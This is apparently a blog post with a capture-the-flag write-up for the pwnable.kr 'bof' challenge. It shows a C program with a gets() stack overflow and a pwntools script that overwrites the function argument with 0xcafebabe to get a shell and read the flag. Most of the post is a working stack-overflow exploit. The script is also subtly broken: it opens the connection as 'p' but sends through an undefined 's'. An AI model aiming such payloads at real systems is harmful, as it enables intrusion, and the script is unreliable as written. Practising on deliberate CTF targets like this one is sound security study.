Pwnable/Pwnable.kr
[Pwnable.kr] bof
dtqdtq01
2019. 2. 17. 06:33
[Pwnable.kr] bof
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
void func(int key){
char overflowme[32];
printf("overflow me : ");
gets(overflowme); // smash me!
if(key == 0xcafebabe){
system("/bin/sh");
}else{
printf("Nah..\n");
}
}
int main(int argc, char* argv[]){
func(0xdeadbeef);
return 0;
}
from pwn import *
#nc pwnable.kr 9000
p = remote("pwnable.kr", 9000)
payload = "A" * 52
payload += "\xbe\xba\xfe\xca"
s.sendline(payload)
s.sendline("ls")
s.sendline("cat flag")
s.interactive()
daddy, I just pwned a buFFer :)